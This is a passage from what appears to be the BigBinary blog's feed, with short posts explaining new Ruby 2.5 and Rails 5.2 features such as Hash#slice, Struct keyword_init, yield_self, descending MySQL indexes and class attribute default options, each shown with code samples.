<code>test-production-web</code>service.</p><p><code>/api</code> is routed to <code>test-production-api</code> service.</p><p><code>/websocket</code> is routed to <code>test-production-websocket</code> service.</p><p>Thus ingress implementation solves our purpose of path based routing andterminating SSL on L7 on Kubernetes.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 default option to module & class attribute accessors]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-default-options-to-module-and-class-attribute-accessors"/>
      <updated>2018-02-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-default-options-to-module-and-class-attribute-accessors</id>
      <content type="html"><![CDATA[<p>When DHH introduced<a href="https://blog.bigbinary.com/2018/02/21/rails-5-2-supports-specifying-default-value-for-a-class_attribute.html">support for specifying a default value for class_attribute</a>,Genadi Samokovarov<a href="https://github.com/rails/rails/pull/29270#issuecomment-304705841">brought to notice</a>that the module and class attribute accessor macros also support specifying adefault value but using a block and not with a <code>default</code> option.</p><p>To have consistent and symmetrical behaviour across all the attributeextensions, it was decided to support specifying a default value using <code>default</code>option for all the module and class attribute macros as well.</p><p><code>mattr_accessor</code>, <code>mattr_reader</code> and <code>mattr_writer</code> macros generate getter andsetter methods at the module level.</p><p>Similarly, <code>cattr_accessor</code>, <code>cattr_reader</code>, and <code>cattr_writer</code> macros generategetter and setter methods at the class level.</p><h2>Before Rails 5.2</h2><p>Before Rails 5.2, this is how we would set the default values for the module andclass attribute accessor macros.</p><pre><code class="language-ruby">module ActivityLoggerHelper  mattr_accessor :colorize_logs  mattr_writer :log_ip { false }  self.colorize_logs = trueendclass ActivityLogger  include ActivityLoggerHelper  cattr_writer :logger { Logger.new(STDOUT) }  cattr_accessor :level  cattr_accessor :settings  cattr_reader :pid { Process.pid }  @@level = Logger::DEBUG  self.settings = {}end</code></pre><h2>After Rails 5.2</h2><p>We can still set a default value of a module or class attribute accessor byproviding a block. In this<a href="https://github.com/rails/rails/pull/29294">pull request</a>, support forspecifying a default value using a new <code>default</code> option has been introduced.</p><p>So instead of</p><pre><code class="language-ruby">cattr_writer :logger { Logger.new(STDOUT) }</code></pre><p>or</p><pre><code class="language-ruby">cattr_writer :loggerself.logger = Logger.new(STDOUT)</code></pre><p>or</p><pre><code class="language-ruby">cattr_writer :logger@@logger = Logger.new(STDOUT)</code></pre><p>we can now easily write</p><pre><code class="language-ruby">cattr_writer :logger, default: Logger.new(STDOUT)</code></pre><p>Same applies to the other attribute accessor macros like <code>mattr_accessor</code>,<code>mattr_reader</code>, <code>mattr_writer</code>, <code>cattr_accessor</code>, and <code>cattr_reader</code>.</p><p>Note that, the old way of specifying a default value using the block syntax willwork but will not be documented anywhere.</p><p>Also, note that if we try to set the default value by both ways i.e. byproviding a block as well as by specifying a <code>default</code> option; the valueprovided by <code>default</code> option will always take the precedence.</p><pre><code class="language-ruby">mattr_accessor(:colorize_logs, default: true) { false }</code></pre><p>Here, <code>@@colorize_logs</code> would be set with <code>true</code> as per the above precedencerule.</p><p><a href="https://github.com/rails/rails/blob/b6b0c99ff3e8ace3f42813154dbe4b8ad6a98e6c/activesupport/test/core_ext/module/attribute_accessor_test.rb#L45-L47">Here is a test</a>which verifies this behavior.</p><p>Finally, here is simplified version using the new <code>default</code> option.</p><pre><code class="language-ruby">module ActivityLoggerHelper  mattr_accessor :colorize_logs, default: true  mattr_writer :log_ip, default: falseendclass ActivityLogger  include ActivityLoggerHelper  cattr_writer :logger, default: Logger.new(STDOUT)  cattr_accessor :level, default: Logger::DEBUG  cattr_accessor :settings, default: {}  cattr_reader :pid, default: Process.pidend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 specifying default value for class_attribute]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-supports-specifying-default-value-for-a-class_attribute"/>
      <updated>2018-02-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-supports-specifying-default-value-for-a-class_attribute</id>
      <content type="html"><![CDATA[<p>It is very common to set a default value for a <code>class_attribute</code>.</p><p>Before Rails 5.2, to specify a default value for a <code>class_attribute</code>, we neededto write like this.</p><pre><code class="language-ruby">class ActivityLoggerclass_attribute :loggerclass_attribute :settingsself.logger = Logger.new(STDOUT)self.settings = {}end</code></pre><p>As we can see above, it requires additional keystrokes to set a default valuefor each <code>class_attribute</code>.</p><p>Rails 5.2 has added support for specifying a default value for a<code>class_attribute</code> using <code>default</code> option.</p><pre><code class="language-ruby">class ActivityLoggerclass_attribute :logger, default: Logger.new(STDOUT)class_attribute :settings, default: {}end</code></pre><p>This enhancement was introduced in this<a href="https://github.com/rails/rails/pull/29270">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 added Hash#slice method]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-added-hash-slice-method"/>
      <updated>2018-02-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-added-hash-slice-method</id>
      <content type="html"><![CDATA[<h4>Ruby 2.4</h4><p>Let's say we have a hash<code>{ id: 1, name: 'Ruby 2.5', description: 'BigBinary Blog' }</code> and we want toselect key value pairs having the keys <code>name</code> and <code>description</code>.</p><p>We can use the<a href="https://ruby-doc.org/core-2.4.2/Hash.html#method-i-select">Hash#select</a> method.</p><pre><code class="language-ruby">irb&gt; blog = { id: 1, name: 'Ruby 2.5', description: 'BigBinary Blog' }  =&gt; {:id=&gt;1, :name=&gt;&quot;Ruby 2.5&quot;, :description=&gt;&quot;BigBinary Blog&quot;}irb&gt; blog.select { |key, value| [:name, :description].include?(key) }  =&gt; {:name=&gt;&quot;Ruby 2.5&quot;, :description=&gt;&quot;BigBinary Blog&quot;}</code></pre><p><a href="https://bugs.ruby-lang.org/users/5184">Matzbara Masanao</a> proposed a simplemethod to take care of this problem.</p><p>Some of the names proposed were <code>choice</code> and <code>pick</code>.</p><p><a href="https://twitter.com/yukihiro_matz">Matz</a> suggested the name <code>slice</code> since thismethod is ActiveSupport compatible.</p><h4>Ruby 2.5.0</h4><pre><code class="language-ruby">irb&gt; blog = { id: 1, name: 'Ruby 2.5', description: 'BigBinary Blog' }  =&gt; {:id=&gt;1, :name=&gt;&quot;Ruby 2.5&quot;, :description=&gt;&quot;BigBinary Blog&quot;}irb&gt; blog.slice(:name, :description)  =&gt; {:name=&gt;&quot;Ruby 2.5&quot;, :description=&gt;&quot;BigBinary Blog&quot;}</code></pre><p>So, now we can use a simple method <code>slice</code> to select key value pairs from a hashwith specified keys.</p><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/6c50bdda0b">commit</a>and <a href="https://bugs.ruby-lang.org/issues/13563">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 allows creating structs with keyword arguments]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-allows-creating-structs-with-keyword-arguments"/>
      <updated>2018-01-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-allows-creating-structs-with-keyword-arguments</id>
      <content type="html"><![CDATA[<p>In Ruby, structs can be created using positional arguments.</p><pre><code class="language-ruby">Customer = Struct.new(:name, :email)Customer.new(&quot;John&quot;, &quot;john@example.com&quot;)</code></pre><p>This approach works when the arguments list is short. When arguments listincreases then it gets harder to track which position maps to which value.</p><p>Here if we pass keyword argument then we won't get any error. But the values arenot what we wanted.</p><pre><code class="language-ruby">Customer.new(name: &quot;John&quot;, email: &quot;john@example.com&quot;)=&gt; #&lt;struct Customer name={:name=&gt;&quot;John&quot;, :email=&gt;&quot;john@example.com&quot;}, email=nil&gt;</code></pre><p>Ruby 2.5 introduced<a href="https://bugs.ruby-lang.org/issues/11925">creating structs using keyword arguments</a>.Relevant pull request is <a href="https://github.com/ruby/ruby/pull/1771/files">here</a>.</p><p>However this introduces a problem. How do we indicate to <code>Struct</code> if we want topass arguments using position or keywords.</p><p>Takashi Kokubun<a href="https://bugs.ruby-lang.org/issues/11925#journal-68208-private_notes">suggested</a>to use <code>keyword_argument</code> as an identifier.</p><pre><code class="language-ruby">Customer = Struct.new(:name, :email, keyword_argument: true)Customer.create(name: &quot;John&quot;, email: &quot;john@example.com&quot;)</code></pre><p>Matz<a href="https://bugs.ruby-lang.org/issues/11925#journal-68295-private_notes">suggested</a>to change the name to <code>keyword_init</code>.</p><p>So in Ruby 2.5 we can create structs using keywords as long as we are passing<code>keyword_init</code>.</p><pre><code class="language-ruby">Customer = Struct.new(:name, :email, keyword_init: true)Customer.new(name: &quot;John&quot;, email: &quot;john@example.com&quot;)=&gt; #&lt;struct Customer name=&quot;John&quot;, email=&quot;john@example.com&quot;&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 allows mailers to use custom Active Job class]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-allows-mailers-to-use-custom-active-job-class"/>
      <updated>2018-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-allows-mailers-to-use-custom-active-job-class</id>
      <content type="html"><![CDATA[<p>Rails allows sending emails asynchronously via Active Job.</p><pre><code class="language-ruby">Notifier.welcome(User.first).deliver_later</code></pre><p>It uses <code>ActionMailer::DeliveryJob</code> as the default job class to send emails.This class is<a href="https://github.com/rails/rails/blob/7b4132f4a28d1c264a972b95bf86bf6230869a40/actionmailer/lib/action_mailer/delivery_job.rb#L10">defined internally</a>by Rails.</p><p>The <code>DeliveryJob</code> defines <code>handle_exception_with_mailer_class</code> method to handleexception and to do some housekeeping work.</p><pre><code class="language-ruby">def handle_exception_with_mailer_class(exception)  if klass = mailer_class    klass.handle_exception exception  else    raise exception  endend</code></pre><p>One might need more control on the job class to retry the job under certainconditions or add more logging around exceptions.</p><p>Before Rails 5.2, it was not possible to use a custom job class for thispurpose.</p><p>Rails 5.2 has added a feature to<a href="https://github.com/rails/rails/pull/29457">configure the job class per mailer</a>.</p><pre><code class="language-ruby">class CustomNotifier &lt; ApplicationMailer  self.delivery_job = CustomNotifierDeliveryJobend</code></pre><p>By default, Rails will use the internal <code>DeliveryJob</code> class if the<code>delivery_job</code> configuration is not present in the mailer class.</p><p>Now, Rails will use <code>CustomNotifierDeliveryJob</code> for sending emails forCustomNotifier mailer.</p><pre><code class="language-ruby">CustomNotifier.welcome(User.first).deliver_later</code></pre><p>As mentioned above <code>CustomNotifierDeliveryJob</code> can be further configured forlogging, exception handling and reporting.</p><p>By default, <code>deliver_later</code> will pass following arguments to the <code>perform</code>method of the <code>CustomNotifierDeliveryJob</code>.</p><ul><li>mailer class name</li><li>mailer method name</li><li>mail delivery method</li><li>original arguments with which the mail is to be sent</li></ul><pre><code class="language-ruby">class CustomNotifierDeliveryJob &lt; ApplicationJob  rescue_from StandardError, with: :handle_exception_with_mailer_class  retry_on CustomNotifierException  discard_on ActiveJob::DeserializationError  def perform(mailer, mail_method, delivery_method, *args)    logger.log &quot;Mail delivery started&quot;    klass = mailer.constantize    klass.public_send(mail_method, *args).send(delivery_method)    logger.log &quot;Mail delivery completed&quot;  end  def handle_exception_with_mailer_class(exception)    if klass = mailer_class      klass.handle_exception exception    else      raise exception    end  endend</code></pre><p>We can also simply inherit from the <code>ActionMailer::DeliveryJob</code> and override theretry logic.</p><pre><code class="language-ruby">class CustomNotifierDeliveryJob &lt; ActionMailer::DeliveryJob  retry_on CustomNotifierExceptionend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 supports descending indexes for MySQL]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-supports-descending-indexes-for-mysql"/>
      <updated>2018-01-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-supports-descending-indexes-for-mysql</id>
      <content type="html"><![CDATA[<p>An index is used to speed up the performance of queries on a database.</p><p>Rails allows us to create index on a database column by means of a migration. Bydefault, the sort order for the index is ascending.</p><p>But consider the case where we are fetching reports from the database. And whilequerying the database, we always want to get the latest report. In this case, itis efficient to specify the sort order for the index to be descending.</p><p>We can specify the sort order by adding an index to the required column byadding a migration .</p><pre><code class="language-ruby">add_index :reports, [:user_id, :name], order: { user_id: :asc, name: :desc }</code></pre><h2>PostgreSQL</h2><p>If our Rails application is using postgres database, after running the abovemigration we can verify that the sort order was added in schema.rb</p><pre><code class="language-ruby">create_table &quot;reports&quot;, force: :cascade do |t|  t.string &quot;name&quot;  t.integer &quot;user_id&quot;  t.datetime &quot;created_at&quot;, null: false  t.datetime &quot;updated_at&quot;, null: false  t.index [&quot;user_id&quot;, &quot;name&quot;], name: &quot;index_reports_on_user_id_and_name&quot;, order: { name: :desc }end</code></pre><p>Here, the index for <code>name</code> has sort order in descending. Since the default isascending, the sort order for <code>user_id</code> is not specified in schema.rb.</p><h2>MySQL &lt; 8.0.1</h2><p>For <strong>MySQL &lt; 8.0.1</strong>, running the above migration, would generate the followingschema.rb</p><pre><code class="language-ruby">create_table &quot;reports&quot;, force: :cascade do |t|  t.string &quot;name&quot;  t.integer &quot;user_id&quot;  t.datetime &quot;created_at&quot;, null: false  t.datetime &quot;updated_at&quot;, null: false  t.index [&quot;user_id&quot;, &quot;name&quot;], name: &quot;index_reports_on_user_id_and_name&quot;end</code></pre><p>As we can see, although the migration runs successfully, it ignores the sortorder and the default ascending order is added.</p><h2>Rails 5.2 and MySQL &gt; 8.0.1</h2><p><strong>MySQL 8.0.1</strong><a href="https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-1.html#mysqld-8-0-1-optimizer">added support</a>for descending indices.</p><p>Rails community was quick<a href="https://github.com/rails/rails/pull/28773">to integrate it as well</a>. So now inRails 5.2, we can add descending indexes for MySQL databases.</p><p>Running the above migration would lead to the same output in schema.rb file asthat of the postgres one.</p><pre><code class="language-ruby">create_table &quot;reports&quot;, force: :cascade do |t|  t.string &quot;name&quot;  t.integer &quot;user_id&quot;  t.datetime &quot;created_at&quot;, null: false  t.datetime &quot;updated_at&quot;, null: false  t.index [&quot;user_id&quot;, &quot;name&quot;], name: &quot;index_reports_on_user_id_and_name&quot;, order: { name: :desc }end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 adds Hash#transform_keys method]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-adds-hash-transform_keys-method"/>
      <updated>2018-01-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-adds-hash-transform_keys-method</id>
      <content type="html"><![CDATA[<p>Ruby 2.4 added<a href="https://bigbinary.com/blog/ruby-2-4-added-hash-transform-values-and-its-destructive-version-from-active-support">Hash#transform_values</a>method to transform values of the hash.</p><p>In Ruby 2.5, a similar method<a href="https://bugs.ruby-lang.org/issues/13583">Hash#transform_keys</a> is added fortransforming keys of the hash.</p><pre><code class="language-ruby">&gt;&gt; h = { name: &quot;John&quot;, email: &quot;john@example.com&quot; }=&gt; {:name=&gt;&quot;John&quot;, :email=&gt;&quot;john@example.com&quot;}&gt;&gt; h.transform_keys { |k| k.to_s }=&gt; {&quot;name&quot;=&gt;&quot;John&quot;, &quot;email&quot;=&gt;&quot;john@example.com&quot;}</code></pre><p>The bang sibling of this method, <code>Hash#transform_keys!</code> is also added whichchanges the hash in place.</p><p>These two methods are already present in<a href="http://guides.rubyonrails.org/active_support_core_extensions.html#transform-keys-and-transform-keys-bang">Active Support from Rails</a>and are natively supported in Ruby now.</p><p>Rails master is already supporting<a href="https://github.com/rails/rails/commit/f213e926892">using the native methods</a> ifsupported by the Ruby version.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 pass request params to Action Mailer previews]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-allows-passing-request-params-to-action-mailer-previews"/>
      <updated>2018-01-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-allows-passing-request-params-to-action-mailer-previews</id>
      <content type="html"><![CDATA[<p>Rails has inbuilt feature to preview the emails using<a href="http://guides.rubyonrails.org/action_mailer_basics.html#previewing-emails">Action Mailer previews</a>.</p><p>A preview mailer can be setup as shown here.</p><pre><code class="language-ruby">class NotificationMailer &lt; ApplicationMailerdef notify(email: email, body: body)user = User.find_by(email: email)mail(to: user.email, body: body)endendclass NotificationMailerPreview &lt; ActionMailer::Previewdef notifyNotificationMailer.notify(email: User.first.email, body: &quot;Hi there!&quot;)endend</code></pre><p>This will work as expected. But our email template is displayed differentlybased on user's role. To test this, we need to update the notify method and thencheck the updated preview.</p><p>What if we could just pass the email in the preview URL.</p><pre><code class="language-plaintext">http://localhost:3000/rails/mailers/notification/notify?email=superadmin@example.com</code></pre><p>In Rails 5.2, we can pass the params directly in the URL and<a href="https://github.com/rails/rails/pull/28244">params will be available to the preview mailers</a>.</p><p>Our code can be changed as follows to use the params.</p><pre><code class="language-ruby">class NotificationMailerPreview &lt; ActionMailer::Previewdef notifyemail = params[:email] || User.first.emailNotificationMailer.notify(email: email, body: &quot;Hi there!&quot;)endend</code></pre><p>This allows us to test our mailers with dynamic input as per requirements.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 enumerable predicates accept pattern argument]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-enumerable-predicates-accept-pattern-argument"/>
      <updated>2018-01-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-enumerable-predicates-accept-pattern-argument</id>
      <content type="html"><![CDATA[<p>Ruby 2.5.0 was recently<a href="https://www.ruby-lang.org/en/news/2017/12/25/ruby-2-5-0-released/">released</a>.</p><p>Ruby has sequence predicates such as <code>all?</code>, <code>none?</code>, <code>one?</code> and <code>any?</code> whichtake a block and evaluate that by passing every element of the sequence to it.</p><pre><code class="language-ruby">if queries.any? { |sql| /LEFT OUTER JOIN/i =~ sql }logger.log &quot;Left outer join detected&quot;end</code></pre><p>Ruby 2.5 allows using a shorthand for this by<a href="https://bugs.ruby-lang.org/issues/11286">passing a pattern argument</a>.Internally <code>case equality operator(===)</code> is used against every element of thesequence and the pattern argument.</p><pre><code class="language-ruby">if queries.any?(/LEFT OUTER JOIN/i)logger.log &quot;Left outer join detected&quot;end# Translates to:queries.any? { |sql| /LEFT OUTER JOIN/i === sql }</code></pre><p>This allows us to write concise and shorthand expressions where block is onlyused for comparisons. This feature is applicable to <code>all?</code>, <code>none?</code>, <code>one?</code> and<code>any?</code> methods.</p><h3>Similarities with Enumerable#grep</h3><p>This feature is based on how <code>Enumerable#grep</code> works. <code>grep</code> returns an array ofevery element in the sequence for which the <code>case equality operator(===)</code>returns true by applying the pattern. In this case, the <code>all?</code> and friendsreturn true or false.</p><p>There is a <a href="https://bugs.ruby-lang.org/issues/14197">proposal</a> to add it for<code>select</code> and <code>reject</code> as well.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 adds bootsnap to the app to speed up boot time]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-bootsnap-to-the-app-to-speed-up-boot-time"/>
      <updated>2018-01-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-bootsnap-to-the-app-to-speed-up-boot-time</id>
      <content type="html"><![CDATA[<p>Rails 5.2 beta 1 was recently<a href="http://weblog.rubyonrails.org/2017/11/27/Rails-5-2-Active-Storage-Redis-Cache-Store-HTTP2-Early-Hints-Credentials/">released</a>.</p><p>If we generate a new Rails app using Rails 5.2, we will see bootsnap gem in theGemfile. <a href="https://github.com/Shopify/bootsnap">bootsnap</a> helps in reducing theboot time of the app by caching expensive computations.</p><p>In a new Rails 5.2 app, <code>boot.rb</code> will contain following content:</p><pre><code class="language-ruby">ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__)require 'bundler/setup' # Set up gems listed in the Gemfile.require 'bootsnap/setup' # Speed up boot time by caching expensive operations.if %w[s server c console].any? { |a| ARGV.include?(a) }  puts &quot;=&gt; Booting Rails&quot;end</code></pre><p>This sets up bootsnap to start in all environments. We can toggle it perenvironment as required.</p><p>This works out of the box and we don't have do to anything for the new app.</p><p>If we are upgrading an older app which already has bootsnap, then we need tomake sure that we are using bootsnap &gt;= 1.1.0 because new Rails apps ship withthat version constraint.</p><p>If the app doesn't contain the bootsnap gem already then we will need to add itmanually since <code>rails app:update</code> task adds the <code>bootsnap/setup</code> line to<code>boot.rb</code> regardless of its presence in the Gemfile.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 requires pp by default]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-requires-pp-by-default"/>
      <updated>2017-12-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-requires-pp-by-default</id>
      <content type="html"><![CDATA[<p>Ruby 2.5.0-preview1 was recently<a href="https://www.ruby-lang.org/en/news/2017/10/10/ruby-2-5-0-preview1-released/">released</a>.</p><p>Ruby allows pretty printing of objects using<a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/pp/rdoc/PP.html">pp method</a>.</p><p>Before Ruby 2.5, we had to require PP explicitly before using it. Even theofficial documentation states that &quot;All examples assume you have loaded the PPclass with require 'pp'&quot;.</p><pre><code class="language-ruby">&gt;&gt; months = %w(January February March)=&gt; [&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]&gt;&gt; pp monthsNoMethodError: undefined method `pp' for main:ObjectDid you mean?  pfrom (irb):5from /Users/prathamesh/.rbenv/versions/2.4.1/bin/irb:11:&gt;&gt; require 'pp'=&gt; true&gt;&gt; pp months[&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]=&gt; [&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]</code></pre><p>In Ruby 2.5, we don't need to require pp. It<a href="https://bugs.ruby-lang.org/issues/14123">gets required by default</a>. We can useit directly.</p><pre><code class="language-ruby">&gt;&gt; months = %w(January February March)=&gt; [&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]&gt;&gt; pp months[&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]=&gt; [&quot;January&quot;, &quot;February&quot;, &quot;March&quot;]</code></pre><p>This feature was added after Ruby 2.5.0 preview 1 was released, so it's notpresent in the preview. It's present in<a href="https://github.com/ruby/ruby">Ruby trunk</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Array#prepend and Array#append in Ruby 2.5]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/array-prepend-and-array-append-in-ruby-2-5"/>
      <updated>2017-12-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/array-prepend-and-array-append-in-ruby-2-5</id>
      <content type="html"><![CDATA[<p>Ruby has <code>Array#unshift</code> to prepend an element to the start of an array and<code>Array#push</code> to append an element to the end of an array.</p><p>The names of these methods are not very intuitive. Active Support from Railsalready has aliases for<a href="https://github.com/rails/rails/blob/e48704db8e6021b690b1fe2b362c7cb2e624e173/activesupport/lib/active_support/core_ext/array/prepend_and_append.rb">the unshift and push methods</a>, namely <code>prepend</code> and <code>append</code>.</p><p>In Ruby 2.5, these methods<a href="https://bugs.ruby-lang.org/issues/12746">are added in the Ruby language itself</a>.</p><pre><code class="language-ruby">&gt;&gt; a = [&quot;hello&quot;]=&gt; [&quot;hello&quot;]&gt;&gt; a.append &quot;world&quot;=&gt; [&quot;hello&quot;, &quot;world&quot;]&gt;&gt; a.prepend &quot;Hey&quot;=&gt; [&quot;Hey&quot;, &quot;hello&quot;, &quot;world&quot;]&gt;&gt;</code></pre><p>They are implemented as aliases to the original <code>unshift</code> and <code>push</code> methods sothere is no change in the behavior.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 added yield_self]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-added-yield_self"/>
      <updated>2017-12-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-added-yield_self</id>
      <content type="html"><![CDATA[<p>Ruby 2.5 added a new method named<a href="https://bugs.ruby-lang.org/issues/6721">yield_self</a>. It yields the receiver tothe given block and returns output of the last statement in the block.</p><pre><code class="language-ruby">irb&gt; &quot;Hello&quot;.yield_self { |str| str + &quot; World&quot; }  =&gt; &quot;Hello World&quot;</code></pre><h4>How is it different from <code>try</code> in Rails ?</h4><p>Without a method argument <a href="https://apidock.com/rails/v4.2.7/Object/try">try</a>behaves similar to <code>yield_self</code>. It would yield to the given block unless thereceiver is nil and returns the output of the last statement in the block.</p><pre><code class="language-ruby">irb&gt; &quot;Hello&quot;.try { |str| str + &quot; World&quot; }  =&gt; &quot;Hello World&quot;</code></pre><p>Couple of differences to note are, <code>try</code> is not part of <code>Ruby</code> but <code>Rails</code>. Also<code>try</code>'s main purpose is protection against <code>nil</code> hence it doesn't execute theblock if receiver is <code>nil</code>.</p><pre><code class="language-ruby">irb&gt; nil.yield_self { |obj| &quot;Hello World&quot; }  =&gt; &quot;Hello World&quot;irb&gt; nil.try { |obj| &quot;Hello World&quot; }  =&gt; nil</code></pre><h4>What about <code>tap</code>?</h4><p><code>tap</code> also is similar to <code>yield_self</code>. It's part of Ruby itself. The onlydifference is the value that is returned. <code>tap</code> returns the receiver itselfwhile <code>yield_self</code> returns the output of the block.</p><pre><code class="language-ruby">irb&gt; &quot;Hello&quot;.yield_self { |str| str + &quot; World&quot; }  =&gt; &quot;Hello World&quot;irb&gt; &quot;Hello&quot;.tap { |str| str + &quot; World&quot; }  =&gt; &quot;Hello&quot;</code></pre><p>Overall, <code>yield_self</code> improves readability of the code by promoting chainingover nested function calls. Here is an example of both the styles.</p><pre><code class="language-ruby">irb&gt; add_greeting = -&gt; (str) { &quot;HELLO &quot; + str }irb&gt; to_upper = -&gt; (str) { str.upcase }# with new `yield_self`irb&gt; &quot;world&quot;.yield_self(&amp;to_upper)            .yield_self(&amp;add_greeting)  =&gt; &quot;HELLO WORLD&quot;# nested function callsirb&gt; add_greeting.call(to_upper.call(&quot;world&quot;))  =&gt; &quot;HELLO WORLD&quot;</code></pre><p><code>yield_self</code> is part of <code>Kernel</code> and hence it's available to all the objects.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 fetch_values for HashWithIndifferentAccess]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-implements-fetch_values-for-hashwithindifferentaccess"/>
      <updated>2017-12-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-implements-fetch_values-for-hashwithindifferentaccess</id>
      <content type="html"><![CDATA[<p>Ruby 2.3 added<a href="https://bugs.ruby-lang.org/issues/10017">fetch_values method to hash</a>.</p><p>By using <code>fetch_values</code> we are able to get values for multiple keys in a hash.</p><pre><code class="language-ruby">capitals = { usa: &quot;Washington DC&quot;,             china: &quot;Beijing&quot;,             india: &quot;New Delhi&quot;,             australia: &quot;Canberra&quot; }capitals.fetch_values(:usa, :india)#=&gt; [&quot;Washington DC&quot;, &quot;New Delhi&quot;]capitals.fetch_values(:usa, :spain) { |country| &quot;N/A&quot; }#=&gt; [&quot;Washington DC&quot;, &quot;N/A&quot;]</code></pre><p>Rails 5.2 introduces method <code>fetch_values</code><a href="https://github.com/rails/rails/pull/28316">on HashWithIndifferentAccess</a>. We'llhence be able to fetch values of multiple keys on any instance ofHashWithIndifferentAccess class.</p><pre><code class="language-ruby">capitals = HashWithIndifferentAccess.newcapitals[:usa] = &quot;Washington DC&quot;capitals[:china] = &quot;Beijing&quot;capitals.fetch_values(&quot;usa&quot;, &quot;china&quot;)#=&gt; [&quot;Washington DC&quot;, &quot;Beijing&quot;]capitals.fetch_values(&quot;usa&quot;, &quot;spain&quot;) { |country| &quot;N/A&quot; }#=&gt; [&quot;Washington DC&quot;, &quot;N/A&quot;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 added delete_prefix and delete_suffix methods]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-added-delete_prefix-and-delete_suffix-methods"/>
      <updated>2017-11-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-added-delete_prefix-and-delete_suffix-methods</id>
      <content type="html"><![CDATA[<h4>Ruby 2.4</h4><p>Let's say that we have a string <code>Projects::CategoriesController</code> and we want toremove <code>Controller</code>. We can use<a href="https://ruby-doc.org/core-2.4.2/String.html#method-i-chomp">chomp</a> method.</p><pre><code class="language-ruby">irb&gt; &quot;Projects::CategoriesController&quot;.chomp(&quot;Controller&quot;)=&gt; &quot;Projects::Categories&quot;</code></pre><p>However if we want to remove <code>Projects::</code> from the string then there is nocorresponding method of <code>chomp</code>. We need to resort to<a href="https://ruby-doc.org/core-2.4.2/String.html#sub-method">sub</a>.</p><pre><code class="language-ruby">irb&gt; &quot;Projects::CategoriesController&quot;.sub(/Projects::/, '')=&gt; &quot;CategoriesController&quot;</code></pre><p><a href="https://bugs.ruby-lang.org/users/6938">Naotoshi Seo</a> did not like using regularexpression for such a simple task. He proposed that Ruby should have a methodfor taking care of such tasks.</p><p>Some of the names proposed were <code>remove_prefix</code>, <code>deprefix</code>, <code>lchomp</code>,<code>remove_prefix</code> and <code>head_chomp</code>.</p><p><a href="https://twitter.com/yukihiro_matz">Matz</a> suggested the name <code>delete_prefix</code> andthis 